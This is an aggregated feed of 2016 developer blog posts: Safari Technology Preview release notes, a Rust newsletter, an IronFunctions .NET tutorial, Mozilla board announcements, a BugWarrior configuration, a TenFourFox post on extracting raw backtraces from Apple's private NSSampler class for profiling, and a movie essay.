Planet WebKit: Release Notes for Safari Technology Preview 19

Safari Technology Preview Release 19 is now available for download for macOS Sierra. If you already have Safari Technology Preview installed, you can update from the Mac App Store’s Updates tab. This release covers WebKit revisions 208427-209238.

Touch Bar

  • Added support for Touch Bar in WebKit (r208452)

HTML Form Validation

  • Enabled HTML interactive form validation (r209060)

Pointer Lock API

  • Enabled Pointer Lock API (r208903)

Input Events

  • Fixed compositionend events to fire after input events when editing with an IME (r208462)
  • Fixed firing an input event with color data when setting the foreground color for selected text (r208461)

URL Parser

  • Changed URL Parser to prevent treating the first slash after the colon as the path for URLs with no host (r208508)

Custom Elements

  • Fixed document.createElementNS to construct a custom element (r208716)

CSS Font Loading

  • Fixed promises failing to fire for FontFace.load() and FontFaceSet.load() (r208976, r208889)

Shadow DOM

  • Fixed triggering style recalculation when toggling a class in .class ::slotted(*) (r208610)
  • Fixed event.composedPath() to include window (r208641)
  • Fixed slot to work as a flex container (r208743)
  • Fixed the slotchange event to bubble and be dispatched only once (r208817)
  • Fixed slot nodes that ignored transition events (r209065)
  • Fixed document.currentScript to be null when running a script inside a shadow tree (r208660)
  • Fixed the hover state when hovering over a slotted Text node (r208630)

Web Inspector

  • Added support to shift-click on a named color value to cycle through different color formats (r208857)
  • Added support for the Type Profiler and the Code Coverage Profiler in Workers (r208664)
  • Changed selecting folders to display content in the Resources sidebar (r208441)
  • Disabled Warning Filter in Debugger Tab by default (r208701)
  • Improved name sorting in HeapSnapshot data grids (r209115)
  • Improved Worker debugging to pause all targets and view call frames in all targets (r208725)
  • Improved Debugger stack traces to display names for Generator functions (r208885)
  • Improved Debugger to show execution lines for background threads (r208783)
  • Improved Debugger to include showing asynchronous call stacks (r209062, r209213)
  • Fixed URL Breakpoints that resolve in multiple workers to only appear in the UI once (r208746)
  • Fixed layout and display issues in the Settings tab (r208510, r208591, r208686)
  • Made checkbox labels clickable in the Settings tab (r208443)

Rendering

  • Fixed an issue where elements with a negative z-index could sometimes render behind the document body (r208981)
  • Changed the way unsupported emoji are drawn: from being invisible to being an empty box (r208894)
  • Changed flex element wrapping to consider when the width is less than min-width (r209068)

Indexed Database 2.0

  • Implemented IDBCursor.continuePrimaryKey() (r208500)
  • Implemented IDBObjectStore.getKey() (r209197)
  • De-duplicated the names returned by IDBDatabase.objectStoreNames() (r208501)
  • Added support for the IDBDatabase.onclose event (r208568)
  • Fixed some issues with the firing of IDBRequest.onblocked events (r208609)
  • Improved the performance of key (de)serialization during SQLite lookups (r208771)
  • Improved SQLiteStatement performance throughout the SQLite backend (r209096, r209144)
  • Aggressively flush the client’s request queue to the server (r209086)

Accessibility

  • Changed the inverted-colors media query to match on state change instead of page reload (r208915)
  • Fixed the implicit value for aria-level on headings to match the ARIA 1.1 specification (r208696)
  • Exposed aria-busy attribute for authors to indicate when an area of the page is finished updating (r208924)

WebDriver

  • Exposed navigator.webdriver if the page is controlled by automation (r209198)
  • Changed the automation session to terminate if the web process crashes (r208657)

Media

  • Fixed an issue where some animated images would not animate after resetting their animations (r209131)

Security

  • Changed the keygen element to require 2048 or higher RSA key lengths (r208858)
  • Changed window.name to be cleared after a cross-origin navigation (r209076)

Bug Fixes

  • Fixed an issue causing copied text to include the text of CDATA sections and comments (r208565)
  • Improved the performance of setting attributes on input elements of type text (r208653)
  • Fixed a crash when interacting with Issues and Pull Requests on github.com (r208967)
  • Fixed broken tab-focus navigation on some sites (r208922)
  • Fixed a JS bindings generation issue that erroneously caused IntersectionObserver to be exposed, which broke Pinterest, Strava and Netflix (r208983)

Planet Mozilla: This Week in Rust 159

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

Other Weeklies from Rust Community

Crate of the Week

This week's Crate of the Week is seahash, a statistically well-tested fast hash. Thanks to Vikrant Chaudhary for the suggestion! Submit your suggestions and votes for next week!
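
A minimal taste of the crate, assuming its top-level seahash::hash function over a byte slice (add seahash to your Cargo.toml to try it):

extern crate seahash;

fn main() {
    // hash an arbitrary byte slice down to a u64
    let digest: u64 = seahash::hash(b"this week in rust");
    println!("{:016x}", digest);
}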

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

93 pull requests were merged in the last week. This contains a good number of plugin-breaking changes.

New Contributors

  • Clar Charr
  • Theodore DeRego
  • Xidorn Quan

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now. This week's FCPs are:

New RFCs

  • Default struct field values.
  • Alloca for Rust. Add a builtin fn core::mem::reserve<'a, T>(elements: usize) -> StackSlice<'a, T> that reserves space for the given number of elements on the stack and returns a StackSlice<'a, T> to it which derefs to &'a [T].

Style RFCs

Style RFCs are part of the process for deciding on style guidelines for the Rust community and defaults for Rustfmt. The process is similar to the RFC process, but we try to reach rough consensus on issues (including a final comment period) before progressing to PRs. Just like the RFC process, all users are welcome to comment and submit RFCs. If you want to help decide what Rust code should look like, come get involved!

PRs:

Final comment period:

Other notable issues:

Upcoming Events

If you are running a Rust event please add it to the calendar to get it mentioned here. Email the Rust Community Team for access.

fn work(on: RustProject) -> Money

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Such large. Very 128. Much bits.

@nagisa introducing 128-bit integers in Rust.

Thanks to leodasvacas for the suggestion.

Submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and brson.

Planet Mozilla: Playing with .NET (dotnet) and IronFunctions

Again, if you missed it: IronFunctions is an open-source, Lambda-compatible, on-premise, language-agnostic, serverless compute service.

While AWS Lambda only supports Java, Python and Node.js, IronFunctions allows you to use any language you desire by running your code in containers.

With Microsoft being one of the biggest players in open source and .NET going cross-platform, it was only right to add support for it in IronFunctions' fn tool.

TL;DR:

The following demos a .NET function that takes in the URL of an image and generates an MD5 checksum for it:

Using dotnet with functions

Make sure you have downloaded and installed dotnet. Now create an empty dotnet project in the directory of your function:

dotnet new  

By default dotnet creates a Program.cs file with a Main method. To make it work with the IronFunctions fn tool, rename it to func.cs.

mv Program.cs func.cs  

Now change the code to do whatever magic you need it to do. In our case the code takes in the URL of an image and generates an MD5 checksum for it. The code is the following:

using System;  
using System.Text;  
using System.Security.Cryptography;  
using System.IO;

namespace ConsoleApplication  
{
    public class Program
    {
        public static void Main(string[] args)
        {
            // if nothing is being piped in, then exit
            if (!IsPipedInput())
                return;

            var input = Console.In.ReadToEnd();
            var stream = DownloadRemoteImageFile(input);
            var hash = CreateChecksum(stream);
            Console.WriteLine(hash);
        }

        private static bool IsPipedInput()
        {
            try
            {
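                // Console.KeyAvailable throws an InvalidOperationException when
                // stdin is redirected (piped); if we get past this line, input is
                // coming from an interactive console, so nothing was piped in.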
                bool isKey = Console.KeyAvailable;
                return false;
            }
            catch
            {
                return true;
            }
        }
        private static byte[] DownloadRemoteImageFile(string uri)
        {

            var request = System.Net.WebRequest.CreateHttp(uri);
            var response = request.GetResponseAsync().Result;
            var stream = response.GetResponseStream();
            using (MemoryStream ms = new MemoryStream())
            {
                stream.CopyTo(ms);
                return ms.ToArray();
            }
        }
        private static string CreateChecksum(byte[] stream)
        {
            using (var md5 = MD5.Create())
            {
                var hash = md5.ComputeHash(stream);
                var sBuilder = new StringBuilder();

                // Loop through each byte of the hashed data
                // and format each one as a hexadecimal string.
                for (int i = 0; i < hash.Length; i++)
                {
                    sBuilder.Append(hash[i].ToString("x2"));
                }

                // Return the hexadecimal string.
                return sBuilder.ToString();
            }
        }
    }
}

Note: I/O with an IronFunctions function is done via stdin and stdout. This code reads the image URL from stdin and writes the resulting checksum to stdout.
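
Before wiring it up to IronFunctions, you can sanity-check the function locally by piping a URL straight into it. This assumes a working dotnet setup in the project directory (dotnet restore has to run once first):

dotnet restore
echo 'http://lorempixel.com/1920/1920/' | dotnet run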

Using with IronFunctions

Let's first init our code to become IronFunctions deployable:

fn init <username>/<funcname>  

Since IronFunctions relies on Docker to work (we will add rkt support soon), the <username> is required to publish to Docker Hub. The <funcname> is the identifier of the function.

In our case we will use dotnethash as the <funcname>, so the command will look like:

fn init seiflotfy/dotnethash  

Running the command creates the func.yaml file required by IronFunctions; the function image can then be built and pushed.

Push to Docker

fn push  

This will build a Docker image and push it to Docker Hub.

Publishing to IronFunctions

To publish to IronFunctions, run:

fn routes create <app_name>  

where <app_name> is (no surprise here) the name of the app, which can encompass many functions.

This creates a full path in the form of http://<host>:<port>/r/<app_name>/<function>

In my case, I will call the app myapp:

fn routes create myapp  

Calling

Now you can run:

fn call <app_name> <funcname>  

or

curl http://<host>:<port>/r/<app_name>/<function>  

So in my case

echo http://lorempixel.com/1920/1920/ | fn call myapp /dotnethash  

or

curl -X POST -d 'http://lorempixel.com/1920/1920/'  http://localhost:8080/r/myapp/dotnethash  

What now?

You can find the whole code in the examples on GitHub. Feel free to join the Iron.io Team on Slack.
Feel free to write your own examples in any of your favourite programming languages such as Lua or Elixir and create a PR :)

Planet Mozilla: Why I’m joining Mozilla’s Board, by Helen Turvey

Today, I’m very honored to join Mozilla’s Board.

Firefox is how I first got in contact with Mozilla. The browser was my first interaction with free and open source software. I downloaded it in 2004, not with any principled stance in mind, but because it was better, faster, more secure and allowed me to determine how I used it, with add-ons and so forth.

Helen Turvey joins the Mozilla Foundation Board

My love of open began when I saw its direct implications for philanthropy and for diversity: moving from a scarcity model to an abundance model in terms of the information and data we need to make decisions in our lives. The web as a public resource is precious, and we need to fight to keep it an open platform, decentralised, interoperable, secure and accessible to everyone.

Mozilla is community driven, and it is my belief that it makes a more robust organisation, one that bends and evolves instead of crumbles when facing the challenges set before it. Whilst we need to keep working towards a healthy internet, we also need to learn to behave in a responsible manner. Bringing a culture of creating, not just consuming, questioning, not just believing, respecting and learning, to the citizens of the web remains front and centre.

I am passionate about people, and creating spaces for them to evolve, grow and lead in the roles they feel driven to effect change in. I am interested in all aspects of Mozilla’s work, but helping to think through how Mozilla can strategically and tactically support leaders, what value we can bring to the community who is working to protect and evolve the web is where I will focus in my new role as a Mozilla Foundation Board member.

For the last decade I have run the Shuttleworth Foundation, a philanthropic organisation that looks to drive change through open models. The FOSS movement has created widely used software and million-dollar businesses, using collaborative development approaches and open licences. While this model is well established for software, that is not the case for education, philanthropy, hardware or social development.

We try to understand whether, and how, applying the ethos, processes and licences of the free and open source software world to areas outside of software can add value. Can openness help provide key building blocks for further innovation? Can it encourage more collaboration, or help good ideas spread faster? It is by asking these questions that I have learnt about effectiveness and change and hope to bring that along to the Mozilla Foundation Board.

Planet Mozilla: Helen Turvey Joins the Mozilla Foundation Board of Directors

Today, we’re welcoming Helen Turvey as a new member of the Mozilla Foundation Board of Directors. Helen is the CEO of the Shuttleworth Foundation. Her focus on philanthropy and openness throughout her career makes her a great addition to our Board.

Throughout 2016, we have been focused on board development for both the Mozilla Foundation and the Mozilla Corporation boards of directors. Our recruiting efforts for board members have been geared towards building a diverse group of people who embody the values and mission that bring Mozilla to life. After extensive conversations, it is clear that Helen brings the experience, expertise and approach that we seek for the Mozilla Foundation Board.

Helen has spent the past two decades working to make philanthropy better, over half of that time working with the Shuttleworth Foundation, an organization that provides funding for people engaged in social change and helping them have a sustained impact. During her time with the Shuttleworth Foundation, Helen has driven the evolution from traditional funder to the current co-investment Fellowship model.

Helen was educated in Europe, South America and the Middle East and has 15 years of experience working with international NGOs and agencies. She is driven by the belief that openness has benefits beyond the obvious. That openness offers huge value to education, economies and communities in both the developed and developing worlds.

Helen’s contribution to Mozilla has a long history: Helen chaired the digital literacy alliance that we ran in the UK in 2013 and 2014; she’s played a key role in re-imagining MozFest; and she’s been an active advisor to the Mozilla Foundation executive team during the development of the Mozilla Foundation ‘Fuel the Movement’ 3 year plan.

Please join me in welcoming Helen Turvey to the Mozilla Foundation Board of Directors.

Mitchell

You can read Helen’s message about why she’s joining Mozilla here.

Background:

Twitter: @helenturvey

Planet Mozilla: Connecting Bugzilla to TaskWarrior

I’ve mentioned before that I use TaskWarrior to organize my life. Mostly for work, but for personal stuff too (buy this, fix that thing around the house, etc.)

At Mozilla, at least in the circles I run in, the central work queue is Bugzilla. I have bugs assigned to me, suggesting I should be working on them. And I have reviews or “NEEDINFO” requests that I should respond to. Ideally, instead of serving two masters, I could just find all of these tasks represented in TaskWarrior.

Fortunately, there is an integration called BugWarrior that can do just this! It can be a little tricky to set up, though. So in hopes of helping the next person, here’s my configuration:

[general]
targets = bugzilla_mozilla, bugzilla_mozilla_respond
annotation_links = True
log.level = WARNING
legacy_matching = False

[bugzilla_mozilla]
service = bugzilla
bugzilla.base_uri = bugzilla.mozilla.org
bugzilla.ignore_cc = True
# assigned
bugzilla.query_url = https://bugzilla.mozilla.org/query.cgi?list_id=13320987&resolution=---&emailtype1=exact&query_format=advanced&emailassigned_to1=1&email1=dustin%40mozilla.com&product=Taskcluster
add_tags = bugzilla
project_template = moz
description_template = http://bugzil.la/ 
bugzilla.username = USERNAME
bugzilla.password = PASSWORD

[bugzilla_mozilla_respond]
service = bugzilla
bugzilla.base_uri = bugzilla.mozilla.org
bugzilla.ignore_cc = True
# ni?, f?, r?, not assigned
bugzilla.query_url = https://bugzilla.mozilla.org/query.cgi?j_top=OR&list_id=13320900&emailtype1=notequals&emailassigned_to1=1&o4=equals&email1=dustin%40mozilla.com&v4=dustin%40mozilla.com&o7=equals&v6=review%3F&f8=flagtypes.name&j5=OR&o6=equals&v7=needinfo%3F&f4=requestees.login_name&query_format=advanced&f3=OP&bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&f5=OP&v8=feedback%3F&f6=flagtypes.name&f7=flagtypes.name&o8=equals
add_tags = bugzilla, respond
project_template = moz
description_template = http://bugzil.la/ 
bugzilla.username = USERNAME
bugzilla.password = PASSWORD

Out of the box, BugWarrior tries to do some default things, but they are not very fine-grained. The bugzilla.query_url option overrides those defaults (along with bugzilla.ignore_cc) so that only the bugs matching the query are synced.

Sadly, this does, indeed, require me to include my Bugzilla password in the configuration file. API token support would be nice but it’s not there yet – and anyway, that token allows everything the password does, so not a great benefit.

The query URLs are easy to build if you follow this one simple trick: Use the Bugzilla search form to create the query you want. You will end up with a URL containing buglist.cgi. Change that to query.cgi and put the whole URL in BugWarrior’s bugzilla_query_url parameter.

I have two stanzas so that I can assign the respond tag to bugs for which I am being asked for review or needinfo. When I first set this up, I got a lot of errors about duplicate tasks from BugWarrior, because there were bugs matching both stanzas. Write your queries carefully so that no two stanzas will match the same bug. In this case, I’ve excluded bugs assigned to me from the second stanza – why would I be reviewing my own bug, anyway?

I have a nice little moz report that I use in TaskWarrior. Its output looks like this:

ID  Pri Urg  Due        Description
 98 M   7.09 2016-12-04 add a docs page or blog post
 58 H   18.2            http://bugzil.la/1309716 Create a framework for displaying team dashboards
 96 H   7.95            http://bugzil.la/1252948 cron.yml for periodic in-tree tasks
 91 M   6.87            blog about bugwarrior config
111 M   6.71            guide to microservices, to help folks find the services they need to read th
 59 M   6.08            update label-matching in taskcluster/taskgraph/transforms/signing.py to use
 78 M   6.02            http://bugzil.la/1316877 Allow `test-sets` in `test-platforms.yml`
 92 M   5.97            http://bugzil.la/1302192 Merge android-test and desktop-test into a "test" k
 94 M   5.96            http://bugzil.la/1302804 Ensure that tasks in a taskgraph do not have duplic
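
The post doesn't show the definition of the moz report itself; a minimal ~/.taskrc sketch that would produce a similar layout (the filter and sort choices here are assumptions, not taken from the post) is:

report.moz.description=Mozilla work queue
report.moz.columns=id,priority,urgency,due,description
report.moz.labels=ID,Pri,Urg,Due,Description
report.moz.filter=status:pending project:moz
report.moz.sort=urgency-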

Planet Mozilla: 45.6.0b1 available, plus sampling processes for fun and profit

Test builds for TenFourFox 45.6.0 are available (downloads, hashes, release notes). The release notes indicate the definitive crash fix in Mozilla bug 1321357 (i.e., the definitive fix for the issue mitigated in 45.5.1) is in this build; it is not, but it will be in the final release candidate. 45.6.0 includes the removal of HiDPI support, which also allowed some graphical optimizations from which the iMac G4 particularly benefits, the expansion of the JavaScript JIT non-volatile general-purpose register file, an image-heavy scrolling optimization that landed too late for the 45ESR cut and that I pulled down, the removal of telemetry from user-facing chrome JS, and various minor fixes to the file requester code. An additional performance improvement will be landed in 45ESR by Mozilla as a needed prerequisite for another fix; that will also appear in the final release. Look for the release candidate sometime next week, with release to the public late on December 12 as usual, but for now, please test the new improvements so far.

There is now apparently a potential workaround for those of you still having trouble getting the default search engine to stick. I still don't have a good theory for what's going on, however, so if you want to try the workaround please read my information request and post the requested information about your profile before and after to see if the suggested workaround affects that.

I will be in Australia for Christmas and New Year's visiting my wife's family, so additional development is likely to slow over the holidays. Higher-priority items coming up will be implementing user agent support in the TenFourFox prefpane, adding some additional HTML5 features and possibly excising telemetry from garbage and cycle collection, but probably for 45.8 instead of 45.7. I'm also looking at adding some PowerPC-specialized code sections to the platform-independent Ion code generator to see if I can crank up JavaScript performance some more, and possibly some additional work to the AltiVec VP9 codec for VMX-accelerated intraframe prediction. I'm also considering adding AltiVec support to the Theora (VP3) decoder; even though its much lighter processing requirements yield adequate performance on most supported systems, it could be a way to get higher-resolution video workable on lower-spec G4s.

One of the problems with our use of a substantially later toolchain is that (in particular) debugging symbols from later compilers are often gibberish to older profiling and analysis tools. This is why, for example, we have a customized gdb, or debugging at even a basic level wouldn't be possible. If you're really a masochist, go ahead and compile TenFourFox with the debug profile and then try to use a tool like sample or vmmap, or even Shark, to analyze it. If you're lucky, the tool will just freeze. If you're unlucky, your entire computer will freeze or go haywire. I can do performance analysis on a stripped release build, but this yields sample backtraces which are too general to be of any use. We need some way of getting samples off a debug build but not converting the addresses in the backtrace to function names until we can transfer the samples to our own tools that do understand these later debugging symbols.

Apple's open source policy is problematic -- they'll open source the stuff they have to, and you can get at some components like the kernel this way, but many deep dark corners are not documented and one of those is how tools like /usr/bin/sample and Shark get backtraces from other processes. I suspect this is so that they can keep the interfaces unstable and avoid abetting the development of applications that depend on any one particular implementation. But no one said I couldn't disassemble the damn thing. So let's go.

(NB: the below analysis is based on Tiger 10.4.11. It is possible, and even likely, the interface changed in Leopard 10.5.)

With Depeche Mode blaring on the G5, because Dave Gahan is good for debugging, let's look at /usr/bin/sample since it's a much smaller nut to crack than Shark.

% otool -L /usr/bin/sample
/usr/bin/sample:
         /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation (compatibility version 300.0.0, current version 567.29.0)
         /System/Library/PrivateFrameworks/vmutils.framework/Versions/A/vmutils (compatibility version 1.0.0, current version 93.1.0)
         /usr/lib/libgcc_s.1.dylib (compatibility version 1.0.0, current version 1.0.0)
         /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 88.3.4)

Interesting! A private framework! Let's see what Objective-C calls we might get (which are conveniently text strings).

% strings /usr/bin/sample |& more
__dyld_make_delayed_module_initializer_calls
__dyld_image_count
__dyld_get_image_name
__dyld_get_image_header
__dyld_NSLookupSymbolInImage
__dyld_NSAddressOfSymbol
libobjc
__objcInit
__dyld_mod_term_funcs
release
printStatistics
writeOutput:append:
stopSampling
sampleForDuration:interval:
preloadSymbols
initWithPid:symbolRichBinaries:
alloc
intValue
UTF8String
removeObjectAtIndex:
objectAtIndex:
count
indexOfObject:
arrayWithArray:
arguments
processInfo
forceStop
NSSampler
NSMutableArray
NSProcessInfo
NSAutoreleasePool
Interrupted
Not currently sampling -- exiting immediately.
-wait
-mayDie
-file
Waiting for '%s' to appear...
%s appeared.
%s cannot find a process you have access to which has a name like '%s'
sample
Sampling process %d each %u msecs %u times
syntax: sample <pid/partial name> <duration (secs)> { <msecs between samples> } <options>
options: {-mayDie} {-wait} {-subst <old> <new>}*
-file filename specifies where results should be written
-mayDie reads symbol information right away
-wait wait until the process named (usually by partial name) exists, then start sampling
-subst can be used to replace a stripped executable by another
Note that the program must have been started using a full path, rather than a relative path, for analysis to work, or that the -subst option must be specified
setObject:forKey:
dictionary
autorelease
mutableCopy
NSMutableDictionary
%s cannot examine process %d for unknown reasons, even though it appears to exist.
%s cannot examine process %d because the process does not exist.
%s cannot examine process %d (with name like %s) because it no longer appears to be running.
%s cannot examine process %d because you do not have appropriate privileges to examine it.
%s cannot examine process %d for unknown reasons.
-subst

Most of that looks fairly straightforward Objective-C stuff, but what's NSSampler? That's not documented anywhere. Magic Hat can't find it either with the default libraries, but it does if we add those private frameworks. If I use class-dump (3.1.2 works with 10.4), I can get a header file with its methods and object layout. (The header file it generates is usually better than Magic Hat's since Magic Hat sorts things in alphabetical rather than memory order, which will be problematic shortly.) Edited down, it looks like this. (I added the byte offsets, which are only valid for the 32-bit PowerPC OS X ABI.)

@interface NSSampler : NSObject

/*
{
00 BOOL _stop;
04 BOOL _stopped;
08 unsigned int _task;
12 int _pid;
16 double _duration;
24 double _interval;
32 NSMutableArray *_sampleData;
36 NSMutableArray *_sampleTimes;
40 double _previousTime;
48 unsigned int _numberOfDataPoints;
52 double _sigma;
60 double _max;
68 unsigned int _sampleNumberForMax;
72 ImageSymbols *_imageSymbols;
76 NSDictionary *_symbolRichBinaryMappings;
80 BOOL _writeBadAddresses;
84 TaskMemoryCache *_tmc;
88 BOOL _stacksFixed;
92 BOOL _sampleSelf;
96 struct backtraceMagicNumbers _magicNumbers;
}
*/

- (void) _cleanupStacks;
- (void) _initStatistics;
- (void) _makeHighPriority;
- (void) _makeTimeshare;
- (void) _runSampleThread: (id) parameter1;
- (void) dealloc;
- (void) finalize;
- (void) forceStop;
- (void) getStatistics: (void*) parameter1;
- (id) imageSymbols;
- (id) initWithPid: (int) parameter1;
- (id) initWithPid: (int) parameter1 symbolRichBinaries: (id) parameter2;
- (id) initWithSelf;
- (void) preloadSymbols;
- (void) printStatistics;
- (id) rawBacktraces;
- (void) sampleForDuration2: (double) parameter1 interval: (double) parameter2;
- (void) sampleForDuration: (unsigned int) parameter1 interval: (unsigned int) parameter2;
- (int) sampleTask;
- (void) setImageSymbols: (id) parameter1;
- (void) startSamplingWithInterval: (unsigned int) parameter1;
- (void) stopSampling;
- (id) stopSamplingAndReturnCallNode;
- (void) writeBozo;
- (void) writeOutput: (id) parameter1 append: (char) parameter2;

@end
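
For reference, the class-dump run that produces the full header just points at the private framework binary we saw in the otool output; something like this, with the output then trimmed down by hand into NSSampler.h:

% class-dump /System/Library/PrivateFrameworks/vmutils.framework/Versions/A/vmutils > NSSampler.h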

Okay, so now we know what methods are there. How does one call this thing? Let's move to the disassembler. I'll save you my initial trudging through the machine code and get right to the good stuff. I've annotated critical parts below from stepping through the code in the debugger.


% otool -tV /usr/bin/sample
/usr/bin/sample:
(__TEXT,__text) section
00002aa4 or r26,r1,r1 << enter
00002aa8 addi r1,r1,0xfffc
00002aac rlwinm r1,r1,0,0,26
00002ab0 li r0,0x0
00002ab4 stw r0,0x0(r1)
:
:
:
00003260 b 0x3310
00003264 bl 0x3840 ; symbol stub for: _getgid
00003268 bl 0x37d0 ; symbol stub for: _setgid

This looks like something that's trying to get at a process. Let's see what's here.


0000326c lis r3,0x0
00003270 or r4,r30,r30
00003274 addi r3,r3,0x3b9c
00003278 or r5,r29,r29
0000327c or r6,r26,r26
00003280 bl 0x37c0 ; symbol stub for: _printf$LDBL128 // "Sampling process ..."
00003284 lbz r0,0x39(r1)
00003288 cmpwi cr7,r0,0x1
0000328c bne+ cr7,0x32a0 // jumps to 32a0
:
:
:
000032a0 lis r4,0x0
000032a4 lwz r3,0x0(r31)
000032a8 or r5,r25,r25
000032ac lwz r4,0x5010(r4) // 0x399c "sampleForDuration:..."
000032b0 or r6,r23,r23
000032b4 bl 0x3800 ; symbol stub for: _objc_msgSend
000032b8 lis r4,0x0
000032bc lwz r3,0x0(r31)
000032c0 lwz r4,0x500c(r4) // 0x946ba288 "stopSampling"
000032c4 bl 0x3800 ; symbol stub for: _objc_msgSend
000032c8 lis r4,0x0
000032cc lwz r3,0x0(r31)
000032d0 lwz r4,0x5008(r4) // 0x3978 "writeOutput:..."
000032d4 or r5,r22,r22
000032d8 li r6,0x0
000032dc bl 0x3800 ; symbol stub for: _objc_msgSend

That seems simple enough. It seems to allocate and initialize an NSSampler object, (we assume) sets it up with [sampler initWithPid], calls [sampler sampleForDuration], calls [sampler stopSampling] and then calls [sampler writeOutput] to write out the result.

This is not what we want to do, however. What I didn't see in either the disassembly or the class description was an explicit step to convert addresses to symbols, which is what we want to avoid. We might well suspect -(void) writeOutput is doing that, and if we put together a simple-minded program to make these calls as sample does, we indeed get a freeze when we try to write the output. We want to get to the raw addresses instead, but Apple doesn't provide any getter for those tantalizing NSMutableArrays containing the sample data.

Unfortunately for Apple, class-dump gave us the structure of the NSSampler object (recall that Objective-C objects are really just structs with delusions of grandeur), and conveniently those object pointers are right there, so we can pull them out directly! Since they're just NSArrays, hopefully they're smart enough to display themselves. Let's see. (In the below, replace XXX with the process you wish to spy on.)


/* gcc -g -o samplemini samplemini.m \
    -F/System/Library/PrivateFrameworks \
    -framework Cocoa -framework CHUD \
    -framework vmutils -lobjc */

#include <Cocoa/Cocoa.h>
#include "NSSampler.h"

int main(int argc, char **argv) {
    NSSampler *sampler;
    NSMutableArray *sampleData;
    NSMutableArray *sampleTimes;
    uint32_t count, sampleAddr;
    NSAutoreleasePool *shutup = [[NSAutoreleasePool alloc] init];

    sampler = [[NSSampler alloc] init];
    [sampler initWithPid:XXX]; // you provide
    [sampler sampleForDuration:10 interval:10]; // 10 seconds, 10 msec
    [sampler stopSampling];

    // break into the NSSampler struct
    sampleAddr = (uint32_t)sampler;
    count = *(uint32_t *)(sampleAddr + 48);
    fprintf(stdout, "count = %i\n", count);
    sampleData = (NSMutableArray *)*(uint32_t *)(sampleAddr + 32);
    sampleTimes = (NSMutableArray *)*(uint32_t *)(sampleAddr + 36);
    fprintf(stdout, "%s", [[sampleData description] cString]);
    fprintf(stdout, "%s", [[sampleTimes description] cString]);

    [sampler dealloc];
    return 0;
}
Drumroll please.

count = 519
(
    <NSStackBacktrace: Thread 1503: 0x9000af48 0xefffdfd0 0x907de9ac 0x907de2b0 0x932bcb20 0x932bc1b4 0x932bc020 0x937a1734 0x937a13f8 0x06d53d3c 0x9379d93c 0x0 6d57bc8 0x07800f48 0x0785f004 0x0785f9cc 0x0785fd20 0x00004ed4 0x00001d5c 0x0000 1a60 0x9000ae9c 0xffffffe1 > ,
    <NSStackBacktrace: Thread 1603: 0x9002ec8c 0x00424b10 0x05069cb4 0x0504638c 0x050490e0 0x05056600 0x050532cc 0x9002b908 0x0506717c 0x0000016b > ,
    <NSStackBacktrace: Thread 1703: 0x9002bfc8 0x90030a7c 0x015a0b84 0x04d4d40c 0x015a1f18 0x9002b908 0x90030aac 0xffffffdb > ,
:
:
:
)(
    0.01796096563339233,
    0.01785099506378174,
    0.01814299821853638,
    0.01780200004577637,
:
:
:
)

We now have the raw backtraces and the timings, in fractions of a second. There is obviously much more we can do with this, and subsequent to my first experiment I improved the process further, but this suffices for explaining the basic notion. In a future post we'll look at how we can turn those addresses into actual useful function names, mostly because I have a very hacky setup to do so right now and I want to refine it a bit more. :) The basic notion is to get the map of where dyld loaded each library in memory and then compute which function is running based on that offset from the sampled address. /usr/bin/vmmap would normally be the tool we'd employ to do this, but it barfs on TenFourFox too. Fortunately our custom gdb7 can get such a map, at least on a running process. More on that later.

One limitation is that NSSampler doesn't seem able to get samples more frequently than every 15ms or so from a running TenFourFox process even if you ask. I'm not sure yet why this is because other processes have substantially less overhead, though it could be thread-related. Also, even though NSSampler accepts an interval argument, it will grab samples as fast as it can no matter what that interval is. When run against Magic Hat as a test it grabbed them as fast as 0.1ms, so stand by for lots of data!

Incidentally, this process is not apparently what Shark does; Shark uses the later PerfTool framework and an object called PTSampler to do its work instead of vmutils. Although it has analogous methods, the structure of PTSampler is rather more complex than NSSampler and I haven't fully explored its depths. Nevertheless, when it works, Shark can get much more granular samples of processor activity than NSSampler, so it might be worth looking into for a future iteration of this tool. For now, I can finally get backtraces I can work with, and as a result, hopefully some very tricky problems in TenFourFox might get actually solved in the near future.

Planet Mozilla: Taking a look behind the scenes before publicly dismissing something

Lately I started a new thing: watching “behind the scenes” features of movies I didn’t like. At first this happened by chance (YouTube autoplay, to be precise), but now I do it deliberately and it is fascinating.

Van Helsing to me bordered on the unwatchable, but as you can see there are a lot of reasons for that.

When doing that, one thing becomes clear: even if you don’t like something — *it was done by people*. People who had fun doing it. People who put a lot of work into it. People who — for a short period of time at least — thought they were part of something great.

That the end product is flawed or lamentable might not even be their fault. Many a good movie was ruined in the cutting room or hindered by censorship.
Hitchcock’s masterpiece Psycho almost didn’t make it to the screen because you see the flushing of a toilet. Other movies are watered down to get a rating that is more suitable for those who spend the most in cinemas: teenagers. Sometimes it is about keeping the running time of the movie to one that allows for just the right amount of ads to be shown when aired on television.

Take for example Halle Berry as Storm in X-Men. Her “What happens to a toad when it gets struck by lightning? The same thing that happens to everything else.” in her battle with Toad is generally seen as one of the cheesiest and most pointless lines:

This was a problem with cutting: originally the line was a comeback to Toad, who used that construction as his tagline throughout the movie:

However, as it turns out, that was meant to be the punch line to a running joke in the movie. Apparently, Toad had this thing where, multiple times throughout the movie, he would use the line ‘Do you know what happens when a Toad…’ and whatever was relevant at the time. It was meant to happen several times throughout the movie, and Storm using the line against him would have actually seemed really witty. If only we had been granted the context.

